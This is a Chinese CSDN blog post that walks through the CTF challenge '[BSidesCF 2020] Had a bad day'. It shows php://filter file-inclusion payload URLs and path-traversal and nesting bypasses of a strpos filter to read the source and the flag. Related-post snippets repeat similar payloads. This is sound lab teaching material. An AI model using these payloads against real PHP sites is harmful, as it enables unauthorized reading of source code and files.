[BSidesCF 2020]Had a bad day 1

最新推荐文章于 2024-04-26 23:16:19 发布
最新推荐文章于 2024-04-26 23:16:19 发布
阅读量39 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44402100/article/details/132994804
版权

先上payload:

http://48579647-d609-4ef8-b85f-bafbc3f14b9c.node3.buuoj.cn/index.php?category=php://filter/convert.base64-encode/resource=meowers/../flag

http://48579647-d609-4ef8-b85f-bafbc3f14b9c.node3.buuoj.cn/index.php?category=php://filter/convert.base64-encode/index/resource=flag

打开页面发现有来个按钮可疑,按一下试试;

 

很明显 category 这个参数是接收文件名的;由此联想到文件包含,先试试读取源码吧

构造payload: ?category=php://filter/convert.base64-encode/resource=index.php

发现报错信息  /resource=index.php.php

由此猜测 后端文件源码 $file.'.php'

优化payload:      也就是把 .php去掉

?category=php://filter/convert.base64-encode/resource=index

成功读取源码 解密看下php代码,html的不看了:

构造payload俩种方法;

一:http://48579647-d609-4ef8-b85f-bafbc3f14b9c.node3.buuoj.cn/index.php?category=php://filter/convert.base64-encode/resource=meowers/../flag

正是因为 !==  ,所以有了 index/../flag 绕过,构造payload的时候, index和meowers、woofers这三个等效替换

二:http://48579647-d609-4ef8-b85f-bafbc3f14b9c.node3.buuoj.cn/index.php?category=php://filter/convert.base64-encode/index/resource=flag

使用嵌套绕过也可以

 

笑刀刘
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
hada-p2
03-13
【标题】"hada-p2"可能是指一个项目或者软件的版本号,通常在软件开发中,"p2"可能是代表第二个主要版本或一个特定的迭代。在这个上下文中,我们推测"hada-p2"可能是一个基于C#语言的项目。 【描述】由于描述仅为...
HADA protocol-开源
04-28
HADA协议——开源软件在序列比对中的应用》 HADA协议,全称为Hierarchical Annotation Dependent Alignment,是一种用于序列比对的高效且灵活的方法。这个协议的开源实现为生物信息学研究提供了强大的工具,使得...
BUUCTF_[BSidesCF 2020]Had a bad day
m_de_g的博客
04-26 558
【代码】BUUCTF_[BSidesCF 2020]Had a bad day
BUUCTF [BSidesCF 2020] Had a bad day
Senimo
12-11 552
BUUCTF [BSidesCF 2020] Had a bad day 考点: php伪协议嵌套 启动环境: 其中包含两个按钮,选择猫和狗的图片: 此时的URL变为: http://xxx/index.php?category=meowers 其中包含有GET传参,尝试修改category传入的值,得到报错: 其中为include()函数报错,尝试获取index.php页面的源码:php://filter/read=convert.base64-encode/resource=index.php:
BUUCTF Web [BSidesCF 2020]Had a bad day1
网安小趴菜
09-20 911
BUUCTF Web [BSidesCF 2020]Had a bad day1
[BSidesCF 2020]Had a bad day
4pri1
05-24 579
[BSidesCF 2020]Had a bad day https://github.com/BSidesSF/ctf-2020-release/ 点击两个按钮,url栏的category= 会发生变化 这里是伪协议的知识点: ——摘自:https://blog.csdn.net/weixin_44508748/article/details/108162951. 本题用到的就是filter这个伪协议 所以构造url:http://97621188-63ea-4882-...
BUUCTF:[BSidesCF 2020]Had a bad day
末初的CSDN博客
03-30 5353
BUUCTF:[BSidesCF 2020]Had a bad day 可能存在SQL注入或者文件包含,在我尝试读取index.php源码的时候出现了报错信息 的确是文件包含,但是有index.php却读取错误,报错显示无法打开流:操作失败在后面测试的时候,发现除掉后缀即可读取到源码 base64解码读取源码 <?php $file = $_GET['category']; ...
buuctf-[BSidesCF 2020]Had a bad day(小宇特详解)
小宇的web博客
02-16 4618
buuctf-[BSidesCF 2020]Had a bad day(小宇特详解) 先看一下题目 这里上面有注入点,这里怀疑是SQL注入 先尝试读取一下index.php 这里使用php伪协议 payload: php://filter:/convert.base64-encode/resource=index.php 存在文件包含漏洞,但是这里报错了,分析之后是无法打开流:操作失败 这里去除php后缀 payload php://filter/convert.base64-encode/reso
【BUUCTF】[BSidesCF 2020]Had a bad day
aoao331198的博客
04-24 767
注意到url中的参数category,以为是注入点,实际上输入其他的只会一个错误说明 用php伪协议读取文件 /index.php?category=php://filter/convert.base64-encode/resource=index 解密拿到代码 <?php $file = $_GET['category']; if(isset($file)) { if( strpos( $file, "woofers" ) !== false || st.
[BSidesCF 2020]Had a bad day1 ~~不会编程的崽
不会编程的崽的博客
02-12 655
简单文件包含读取
[BSidesCF 2020]Had a bad day1
陈艺秋的博客
07-24 282
这个是利用strops检测file变量中是否包含wofers或meowers或者index的值,如果有,就执行文件包含,那我们还是可以直接进行伪协议的传参。但主要是有,参数的传递,加上前面的index.php,想到了PHP伪协议,或许我们可以直接查看一下隐藏源码。仔细查看报错信息,发现参数在传递的过程中,会自动加上一个.php后缀,所以我们直接去掉后缀就行。进入环境,一上来就是一段激励的话,没有啥特别的,源码中也没有看见啥有用的提示。解码后会得到一串base64字符串,我们可以直接拿去解码,得到源码信息。
六年级英语上册 Unit 7 I had a bad day.第一课时教案 广东版开心.doc
10-13
小学教案
六年级英语上册 Unit 7 I had a bad day.第三课时教案 广东版开心.doc
10-13
小学教案
hada-p3
03-27
hada-p3
05创建公务卡扣减明细表_CASH_USE_MINUSAMT_DETAIL_20240708-刘君.sql
最新发布
07-19
05创建公务卡扣减明细表_CASH_USE_MINUSAMT_DETAIL_20240708-刘君.sql
【BP回归预测】龙格库塔算法优化BP神经网络RUN-BP光伏数据预测(多输入单输出)【含Matlab源码 5171期】.zip
07-19
CSDN海神之光上传的全部代码均可运行,亲测可用,直接换数据就行,适合小白; 1、代码压缩包内容 主函数:Main .m; 数据; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法优化BP神经网络分类预测系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO优化BP 4.4.2 粒子群算法PSO/蛙跳算法SFLA优化BP 4.4.3 灰狼算法GWO/狼群算法WPA优化BP 4.4.4 鲸鱼算法WOA/麻雀算法SSA优化BP 4.4.5 萤火虫算法FA/差分算法DE优化BP 4.4.6 其他优化算法优化BP
在UCA上结合DOA估计算法和自适应波束形成matlab代码.rar
07-19
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
【信号分解】基于海鸥优化算法SOA-CEEMDAN实现信号去躁附matlab代码.rar
07-19
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
1 package had stderr output
07-28
然而,关于"package had stderr output"的问题,我没有找到具体的引用内容来回答这个问题。请提供更多的信息或引用内容,以便我能够给出更准确的答案。 #### 引用[.reference_title] - *1* *2* *3* [ROS2 CmakeList...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值